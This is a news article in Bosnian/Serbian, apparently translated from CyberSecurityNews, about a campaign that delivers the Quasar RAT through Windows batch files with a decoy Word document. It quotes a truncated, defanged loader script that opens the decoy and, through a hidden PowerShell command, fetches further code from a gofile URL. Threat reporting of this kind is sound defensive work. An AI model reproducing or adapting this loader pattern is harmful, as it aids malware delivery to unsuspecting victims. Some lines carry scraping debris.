Istraživači sajber bezbjednosti identifikovali su sofisticiranu novu kampanju u kojoj prijetnje koriste Windows batch fajlove za isporuku poznatog Quasar Remote Access Trojana (RAT).
Ovaj vektor napada predstavlja zabrinjavajuću evoluciju taktika distribucije malvera, jer napadači stalno usavršavaju svoje metode kako bi izbjegli tradicionalne sigurnosne mjere i uspostavili trajni pristup sistemima žrtava.
Kampanja koristi višestepeni lanac napada koji počinje naizgled bezazlenim batch fajlovima, koji služe kao početni vektor infekcije.
Ovi fajlovi su dizajnirani da izgledaju legitimno, dok tajno orkestriraju preuzimanje i izvršavanje malicioznih programa.
Napadači su pokazali značajnu tehničku sofisticiranost primjenom različitih tehnika zamagljivanja (obfuscation) i mjera protiv analize kako bi izbjegli otkrivanje sigurnosnim alatima i u sandbox okruženjima.
Analitičari sa Internet Storm Centra su primijetili da je ova specifična varijanta Quasar RAT-a opremljena unaprijeđenim mogućnostima za izbjegavanje detekcije, što znatno otežava posao stručnjacima za sajber bezbjednost u njenom otkrivanju i analizi.
Kampanja malvera aktivno cilja organizacije iz više sektora, a istraživači su primijetili značajan porast pokušaja infekcije u posljednjih nekoliko sedmica.
Metodologija napada uključuje korišćenje lažnog Office dokumenta koji održava privid legitimnosti dok se maliciozni procesi izvršavaju u pozadini.
Ova komponenta socijalnog inženjeringa ključna je za uspjeh kampanje, jer daje žrtvama lažan osjećaj sigurnosti dok lanac infekcije napreduje neprimijećeno.
Mehanizam infekcije i isporuka malvera
Početni vektor infekcije koristi pažljivo kreiran batch fajl koji implementira dvostepeni proces izvršavanja.
Primarna skript pokreće i lažni dokument i inicira preuzimanje dodatnih malicioznih komponenti sa udaljenih servera.
.webp)
Struktura koda pokazuje da su napadači obraćali pažnju na operativnu sigurnost:
perlCopyEdit@echo off
set "DOCX_PATH=%dp0Game_Purchase_Agreement (1).docx"
set "BAT_URL=hxxps://store3[.]gofile[.]io/download/web/60e1
set "STUB_BAT=%dp0stub.bat"
start "" "%DOCX_PATH%"
powershell -noprofile -windowstyle hidden -command "Invoke-
start /B "%STUB_BAT%"
Sekundarni batch fajl koristi sofisticirane tehnike zamagljivanja, uključujući upotrebu sistemskih varijabli i naredbi goto
za dinamičko rekonstruisanje malicioznog koda.
Izvor: CyberSecurityNews